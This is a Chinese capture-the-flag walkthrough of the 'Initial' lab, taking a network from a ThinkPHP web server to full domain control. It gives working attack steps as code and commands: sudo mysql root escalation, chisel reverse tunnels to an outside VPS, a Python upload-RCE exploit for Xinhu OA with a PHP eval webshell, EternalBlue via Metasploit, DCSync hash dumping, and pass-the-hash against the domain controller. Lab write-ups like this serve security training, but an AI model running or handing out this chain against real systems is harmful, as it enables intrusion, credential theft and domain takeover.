春秋云镜：Initial

考点：

thinkphp 5.0.23 RCE
mysql命令提权
信呼nday
ms17-010(永恒之蓝)
DCSync

拓扑图：

1
2
3

vps---外网靶机1---信呼win---永恒之蓝win---flag3 win
       .1.15       .1.18      .1.21         .1.2
kali

flag01

ThinkPHP 5.0.23 RCE

有报错，判断ThinkPHP 5.0.23

getshell之后

sudo -l

sudo mysql提权

(www-data:/var/www/html) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

1	sudo mysql -e '\! /bin/sh'

拿下flag01

1	flag01: flag{60b53231-

传fscan扫内网，

(www-data:/tmp) $ ./fscan -h 172.22.1.15/24
(www-data:/tmp) $ ./fscan -h 172.22.1.15/24 > /tmp/res.txt
(www-data:/tmp) $ cat /tmp/res.tct
cat: /tmp/res.tct: No such file or directory
(www-data:/tmp) $ cat /tmp/res.txt
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.21     is alive
[*] Icmp alive hosts len is: 4
172.22.1.2:88 open
172.22.1.18:139 open
172.22.1.15:22 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[+] MS17-010 172.22.1.21    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] OsInfo 172.22.1.2    (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

flag02

配置代理

蚁剑上传chisel，建立隧道

./chisel server -p 28190
./chisel client 39.105.51.11:28190 R:28191:socks

sudo vim /etc/proxychains4.conf
socks 39.105.51.11 28191

信呼OAnday

信呼OA弱口令 admin/admin123

rce exp.py

1
2
3

1.php

<?=eval($_POST[1]);?>

import requests
session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

1	http://172.22.1.18/upload/2023-11/22_00150366.php

1	flag02: 2ce3-4813-87d4-

flag03

配置代理

./chisel server -p 28190 --reverse
./chisel client 39.105.51.11:28190 R:0.0.0.0:28191:socks

./chisel server -p 1080 --reverse
start /b chisel.exe client ip:1080 R:1081:socks

sudo vim /etc/proxychains4.conf
socks 39.105.51.11 28191
socks 127.0.0.1 1081

msf打eternalblue

proxychains4 -f /etc/proxychains4.conf msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
run

打hash传递

收集windows机器上的凭据

creds_all

#kiwi打dcsync
#导出域内所有用户Hash

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

#hash传递

#crackmapexec打hash传递
proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.1.2  -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

#或者psexec pth
proxychains4 -f /etc/proxychains4.conf psexec.py -dc-ip 172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 XIAORANG.LAB/administrator/@172.22.1.2

#或者
proxychains4 -f /etc/proxychains4.conf psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codes gbk

┌──(kali㉿kali)-[~]
└─$ proxychains4 -f /etc/proxychains4.conf crackmapexec smb 172.22.1.2  -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/paramiko/transport.py:236: CryptographyDeprecationWarning: Blowfish has been deprecated
  "class": algorithms.Blowfish,
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:445  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:135  ...  OK
SMB         172.22.1.2      445    DC01             [*] Windows Server 2016 Datacenter 14393 x64 (name:DC01) (domain:xiaorang.lab) (signing:True) (SMBv1:True)
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:445  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:445  ...  OK
SMB         172.22.1.2      445    DC01             [+] xiaorang.lab\administrator:10cf89a850fb1cdbe6bb432b859164c8 (Pwn3d!)
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:135  ...  OK
[proxychains] Dynamic chain  ...  39.105.51.11:28191  ...  127.0.0.1:1081  ...  172.22.1.2:49668  ...  OK
SMB         172.22.1.2      445    DC01             [+] Executed command 
SMB         172.22.1.2      445    DC01             ___   ___
SMB         172.22.1.2      445    DC01             \\ / /       / /    // | |     //   ) ) //   ) )  // | |     /|    / / //   ) )                                                               
SMB         172.22.1.2      445    DC01             \  /       / /    //__| |    //   / / //___/ /  //__| |    //|   / / //                                                                       
SMB         172.22.1.2      445    DC01             / /       / /    / ___  |   //   / / / ___ (   / ___  |   // |  / / //  ____                                                                  
SMB         172.22.1.2      445    DC01             / /\\     / /    //    | |  //   / / //   | |  //    | |  //  | / / //    / /                                                                 
SMB         172.22.1.2      445    DC01             / /  \\ __/ /___ //     | | ((___/ / //    | | //     | | //   |/ / ((____/ /                                                                 
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             flag03: e8f88d0d43d6}
SMB         172.22.1.2      445    DC01             
SMB         172.22.1.2      445    DC01             Unbelievable! ! You found the last flag, which means you have full control over the entire domain network.

1	flag03: e8f88d0d43d6}

1	flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}